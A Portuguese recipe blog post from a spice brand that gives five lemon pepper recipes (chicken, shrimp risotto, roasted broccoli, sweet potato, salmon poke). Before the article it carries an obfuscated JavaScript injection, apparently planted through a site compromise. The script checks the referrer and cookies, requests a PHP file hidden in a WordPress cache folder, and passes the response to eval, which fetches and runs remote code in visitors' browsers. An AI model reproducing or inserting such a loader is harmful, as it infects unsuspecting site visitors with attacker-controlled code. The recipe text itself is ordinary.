;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//blog.bombayhs.com.br/wp-content/cache/asset-cleanup/css/item/inline/inline.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Vamos aprender onde usar lemon pepper e para que serve esse delicioso tempero?

Hoje, você confere 5 receitas que leva esse tempero único sem sabor!

Tempero lemon pepper para que serve

É um tempero muito usado na Europa e queridinho nos Estados Unidos, mas a cada dia ganha mais os corações dos brasileiros.

O Lemon Pepper foi criado para dar um toque cítrico às preparações e começou a ser muito utilizado na culinária por adeptos da alimentação saudável no intuito de reduzir o consumo de sal, fazendo assim a sua substituição com muito mais sabor.

Confira também o tempero de ervas finas Bombay.

Lemon pepper onde usar?

1 – Tempero lemon pepper no frango

Ingredientes 

  • 2 filés de frango,
  • 1 dente de alho picadinho,
  • 1 colher de sopa de lemon pepper,
  • 3/4 de xícara de leite,
  • 1 colher de chá de maisena,
  • Azeite e sal a gosto.

Modo de preparo e onde usar lemon pepper:

  1. Tempere os filés com alho, fio de azeite, sal e metade da colher de lemon pepper.
  2. Deixe descansar por 15 minutos na geladeira. Aqueça a frigideira e grelhe os filés.
  3. Separe duas colheres de leite e o restante coloque na frigideira junto com o restante do tempero. Misture bem.
  4. Dissolva a maisena nas duas colheres de leite. Mexa até engrossar.

 

Filé de frango com lemon pepper

2 -Risoto de Camarão

Ingredientes 

  • 2 colheres (sopa) de lemon pepper
  • 6 camarões grandes limpos
  • 60g de manteiga 
  • 2 talos de alho poró em rodelas finas 
  • 2 xícaras (chá) de arroz arbóreo 
  • 100ml de vinho branco 
  • 1,8 litro de caldo de legumes 
  • Pimenta do reino e sal a gosto
  • ½ xícara (chá) de parmesão ralado

Modo de preparo e onde usar lemon pepper:

  1. Aqueça uma frigideira média, antiaderente, em fogo médio.
  2. Adicione os camarões, polvilhe com lemon pepper e salteie. Desligue e reserve quando os camarões estiverem selados e cozidos. 
  3. Para o risoto, em uma panela média, derreta a 50g da manteiga e refogue o alho poró. 
  4. Após isso, adicione o arroz e o vinho branco, misture para secar. Vá adicionando uma concha, por vez, do caldo fervente e mexa. 
  5. Corrija o sal, se necessário.
  6. Continue regando aos poucos com o restante do caldo e mexendo, adicione a outra colher de manteiga e o queijo parmesão.
  7. Deve ser servido imediatamente!

risoto de camarao com lemon pepper bombay

3 – Brócolis assado

Ingredientes 

  • 1 brócolis americano cortado em floretes pequenos,
  • 2 colheres de sobremesa de semente de girassol,
  • 1-2 colheres de sobremesa de lemon pepper,
  • Fio de azeite,

Modo de preparo e onde usar lemon pepper:

  1. Espalhe os floretes de brócolis numa assadeira. Regue com azeite e salpique com lemon pepper.
  2. Misture para espalhar bem. Asse por 20 minutos. Vire os brócolis e deixe mais 10 minutos.
  3. Numa frigideira, toste as sementes de girassol com azeite e lemon pepper.
  4. Depois de assado, acrescente o sal. Salpique com as sementes de girassol.

4 – Baked Potato Doce

Ingredientes 

  • 3 colheres (chá) de lemon pepper Bombay 
  • 3 batatas  doce roxa média
  • 300g  de peito de frango em cubos pequenos
  • 1 vidro de leite de  coco (200ml)
  • 1 colher de (chá) de gengibre em pó
  • coentro picado  a gosto
  • pimenta do reino a gosto
  • 2 colheres (sopa) óleo coco 

Modo de preparo e onde usar lemon pepper:

  1. Em um recipiente , coloque  o frango  cortado em cubos e adicione o lemon pepper,  o gengibre em pó,  a pimenta do reino e deixe na geladeira por no mínimo 30 minutos.
  2. Lave as batatas embrulhe em papel alumínio e leve para assar em forno 180ºC por 30 minutos, ou até que fiquem macias. 
  3. Em uma panela média, aqueça o óleo de coco e junte o frango.
  4. Refogue bem, acrescente o leite de coco e deixe ferver até ficar um molho mais cremoso.
  5. Desligue o fogo e acrescente o coentro.
  6. Retire o papel alumínio das batatas faça um corte apenas para abrir uma cavidade no meio e aperte as extremidades; para que as batatas se abram.
  7. Recheie com frango e finalize com coentro a gosto.

baked potato com lemon pepper

5 – Poke de salmão

Ingredientes do molho

  • 2 colheres de sopa de azeite
  • Suco de 2 limões taiti
  • 10 gotas de óleo de gergelim
  • 1 colher de sopa de lemon pepper
  • 1 punhado de coentro picado

Ingredientes do bowl

  • 200g de salmão fresco cortado em cubos
  • 1 xícara de arroz
  • 1/4 xícara de edamames
  • 1/4 xícara de milho
  • 1 avocado picado
  • 5 tomates cereja

Modo de preparo e onde usar lemon pepper:

  1. Em uma tigela, misturar todos os ingredientes do molho até ficar tudo homogêneo
  2. Misturar o molho com o salmão e reserve.
  3. Monte seu bowl com todos os ingredientes e no final acrescentar o salmão e servir na sequencia.

Onde comprar?

Agora que você já aprendeu algumas formas de onde usar o tempero lemon pepper e para que serve, está na hora de você saber onde comprar o mais conhecido do mercado.

Na Bombay esse tempero é saudável! Conheça mais clicando na foto abaixo, e aproveite!

 

tempero lemon pepper bombay

 

 

 

 

 

 

 

Para mais receitas e dicas, acompanhe o Blog Bombay e esteja sempre por dentro das maiores novidades do mundo das ervas, especiarias e pimentas da gastronomia mundial.

5 Comentários

Deixe uma Resposta